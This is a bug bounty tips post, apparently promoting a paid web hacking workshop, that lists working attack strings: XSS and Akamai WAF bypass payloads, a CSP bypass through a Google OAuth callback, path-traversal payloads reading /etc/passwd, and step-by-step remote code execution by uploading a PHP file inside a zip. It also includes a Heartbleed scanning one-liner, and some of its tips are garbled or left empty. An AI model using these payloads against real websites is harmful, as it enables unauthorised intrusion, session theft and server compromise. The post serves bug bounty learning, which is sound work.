Bug bounty Tips

do share and i would be happy if everyone like to join this free workshop conducted on mastering web hacking. with hands on practice on two vulnerabilities.

Unlock the door to limitless knowledge and skill! 🚀 Join our exclusive workshop and ignite your passion for learning. Subscribe now for an adventure in growth and innovation that awaits! 🌟 #Workshop #LearnWithUs #SubscribeNow https://cipherops.gumroad.com/l/MasteringBugBounty

Don't Ignore wordpress websites :) Payload:

Here, how u can extract the zip file remotely [pip install remotezip # list contents of a remote zip file remotezip -l "http://site/bigfile.zip" # extract file.txt from a remote zip file remotezip "http://site/bigfile.zip" "file.txt"]

Here’s a handy command to extract URLs from junk / assorted data: cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"* By: @imranparray101

heart bleed Vulnerability one liner [cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done]

Broad scope – Apple, RedHat, IBM, OpenBSD, Microsoft, Oracle .. Antivirus products – Avira, Avast!, ESET, TrendMicro, Symantec .. Security appliances – AlienVault, PaloAlto Networks, FireEye .. Network equipment – Cisco, F5 Networks, Linksys .. Chip manufacturers – Arduino, Intel .. VoIP telephony – Asterisk .. Scripting languages – Perl, Python .. Databases – MongoDB, Firebase, Oracle .. Mobile devices – Android, Qualcomm, Nokia, HTC .. Telecommunications – AT&T, Verizon, Vodafone .

bypass alert ==> alert;[alert][0].call(this,1) #xss #web #bypass #bugbountytips

1. How to find Origin IP 2. NucleiFuzzer = Nuclei + Paramspider 3. CRLF injection allow => cookie injection in root domain & xss| 4. How to Find XSS in Wide Scope 5. Remote Code Execution | A Story of Simple RCE on Jenkins Instance. 6. Defeat the HttpOnly flag to achieve Account Takeover | RXSS 7. Discovering Login Panels and Detecting SQL Injection with Logsensor 8. Automating web pentesting with jaeles scanner 9. Afrog scanner for bug bounty hunters 10. RCE via Dependency Confusion 11. How to Get Unique Subdomains on Large scope 12. Expose domains over Akamai or Cloudflare with HEDnsExtractor and httpx #bugbountytips

Some filter bypass payload list while hunting for LFi vulnerability →index.php?page=....//....//etc/passwd →index.php?page=..///////..////..//////etc/passwd →index.php?page=/var/www/../../etc/passwd

Bug Bounty Hunting Tip :- If you can upload .zip file on target then: 1. Create a .php file (rce.php) 2. Compress it to a .zip file (file.zip) 3. Upload your .zip file on the vulnerable web application. 4. Trigger your RCE via: ( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )

A nice way to store the payload "><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script> A payload to bypass Akamai WAF <A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

CSP Protection Bypass (using Google domain) /o/oauth2/revoke?callback=alert(1);console.log

Bug Bounty Reminder Don't forget about the $element\; for\; XSS\; WAF\; bypass\; on\; Firefox\; browser.$ Click\; Me$The$ can\; make\; any\; HTML\; element\; clickable\; within\; it.$$

Check out my company website. Cipherops.tech